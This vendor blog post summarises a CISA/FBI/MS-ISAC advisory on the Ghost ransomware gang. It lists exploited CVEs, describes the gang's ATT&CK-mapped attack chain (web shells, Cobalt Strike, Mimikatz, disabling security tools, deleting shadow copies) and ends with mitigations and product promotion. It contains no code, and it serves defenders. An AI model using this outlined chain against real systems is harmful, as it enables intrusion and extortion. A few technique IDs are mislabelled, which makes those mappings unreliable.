The Cybersecurity and Infrastructure Security Agency (CISA), Federal Bureau of Investigation, and the Multi-State Information Sharing and Analysis Center (MS-ISAC) recently issued a joint Cybersecurity Advisory about the China-based Ghost ransomware gang.
Ghost’s method of initial access focuses on targeting vulnerabilities (technique T1190) in internet-facing devices using publicly available exploits. Some of these vulnerabilities have had patches available for well over a decade. This highlights the importance of patch management in managing an organisation’s attack surface, especially now that 34% of ransomware attacks now exploit vulnerabilities as an initial access vector.
The discovery and exploitation of these vulnerabilities can be highly automated, which has led Ghost to be able to breach organisations in a diverse variety of sectors in over 70 countries since they first appeared in 2021. Victim organisations include many providing government entities and those providing critical national infrastructure. Other targets include those in the education, healthcare, technology, and manufacturing sectors.
Tactics used by the Ghost ransomware gang
Below is a list of 11 tactics used by the Ghost ransomware gang, with links to the descriptions of the tactics and the corresponding techniques.
Initial access (tactic TA0001)
The vulnerabilities used by Ghost target many different types of systems, including:
- Fortinet devices running FortiOS appliances: CVE-2018-13379
- Servers using Adobe’s ColdFusion server-side scripting: CVE-2010-2861 and CVE-2009-3960
- Microsoft SharePoint servers CVE-2019-0604
- Microsoft Exchange servers CVE-2021-34473, CVE-2021-34523 and CVE-2021-31207
Execution (tactic TA0002)
Once inside of a victim network, Ghost deploys a web shell (technique T1505.003), which they then use to issue commands through the resulting command line (ATT&CK techniques T1059.003 and T1059.001) to then download a Cobalt Strike Beacon (technique T1105).
Persistence (tactic TA0003)
In some attacks, Ghost creates new local or domain accounts (techniques T1136.001 and T1136.002, respectively), and changes the passwords for already existing accounts (technique 1098).
More recently, they have been observed laterally moving (tactic TA0008) to web servers in the victim’s networks and deploying web shells (technique T1505.003).
Privilege escalation (tactic TA0004)
Ghost has been seen using open-source penetration testing tools, including BadPotato, GodPotato, and SharpZeroLogon, to gain escalated privileges through escalation (technique T1068).
Other techniques include utilizing the Cobalt Strike Beacon installed during initial access to capture process tokens running under the SYSTEM user context. Then, they execute Beacon a second time with elevated SYSTEM privileges (technique 1134.001).
Defense evasion (tactic TA0005)
Ghost uses its deployed Cobalt Strike Beacon to list processes and identify any end-point security solutions running on the host (technique T1518.01), which they then disable (technique T1562.001) using their escalated privileges.
Credential access (tactic TA0006)
Ghost either utilizes the hashdump feature of Cobalt Strike Beacon or deploys and executes Mimikatz to capture passwords and password hashes. They then use these to gain further accounts in which to log into systems, escalate privileges, or to pivot to other victim devices (technique T1003).
Discovery (tactic TA0007)
Internal reconnaissance is achieved by discovering domain accounts by Ghost using Cobalt Strike Beacon (technique T1562.001), using open-source penetration testing tools like SharpShares to discover network shares (technique T1135), or Ladon 911 and SharpNBTScan to discover other systems on the network (technique T1018).
Lateral movement (tactic TA0008)
The previously escalated privileges and Windows Management Instrumentation Command-Line (WMIC) (technique 1047) to execute base64-encoded PowerShell commands on additional systems on the victim network, typically to deploy further instances of Cobalt Strike Beacon infections.
Exfiltration (tactic TA0010)
Unlike other ransomware gangs, Ghost has not been observed exfiltrating significant amounts of a victim’s data. Ghost typically only exfiltrates less than hundreds of gigabytes, but they still threaten to publish data for extortion purposes.
Exfiltration methods include downloading to Cobalt Strike Team Servers (technique T1041) or downloading to the Mega.nz filesharing service (technique 1567.002).
Command and control (tactic TA0011)
For email communication with extortion victims (techniques 1573), Ghost uses email providers that support encryption, including Mailfence, Onionmail, ProtonMail, Skiff, and Tutanota.
Ghost heavily utilizes the built-in communications capability between Cobalt Strike Beacons installed within the victim’s network and Cobalt Strike Team Servers owned by Ghost. Ghost communicates over HTTP and HTTPS (technique T1071.001) to a Ghost-controlled IP address rather than utilizing registered domains.
Impact (tactic TA0040)
Ghost deploys and executes one of four different ransomware payloads (CRING.EXE, GHOST.EXE, ELYSIUM.EXE, and LOCKER.EXE), all capable of encrypting specific directories or the entire volumes (technique 1486). These clear Windows Event Logs (technique1070.001), disable the Volume Shadow Copy Service, and then delete any shadow copies to inhibit attempts to recover systems (technique 1490).
Ghost extorts victims by threatening to delete the decryption keys and publish exfiltrated data (technique 1486).
Actions to take today
Now that you know what the Ghost ransomware gang is doing, what can you do to mitigate the impact? Start by implementing the mitigations below, taken from the joint Cybersecurity Advisory from CISA, FBI, and MS-ISAC. Note that I’ve added information about Cohesity solutions that can help build resilience to the Ghost ransomware gang.
1. Maintain regular system backups that are known-good and stored offline.
- Cohesity DataProtect and Cohesity FortKnox provide this capability.
2. Ghost actors run many commands, scripts, and programs that IT administrators would have no legitimate reason for running. Victims who identify and respond to this unusual behavior have successfully prevented Ghost ransomware attacks.
- These activities typically leave Indicators of Compromise (IOCs) on victim machines, which may be discovered using Cohesity DataHawk’s threat hunting capability, which is resistant to Ghost’s defense evasion techniques.
3. Patch known vulnerabilities by applying timely security updates to operating systems, software, and firmware within a risk-informed timeframe.
- Cohesity CyberScan allows owners of Tenable Vulnerability Scanner to use their license to scan backup snapshots for vulnerabilities. This is ideal for ensuring fragile assets are included in vulnerability management and investigating the attack surface at the time of the attack.
4. Segment networks to restrict lateral movement from initial infected devices and other devices in the same organization.
5. Require phishing-resistant MFA for access to all privileged accounts and email services accounts.
Read the full list of mitigations from the joint Cybersecurity Advisory.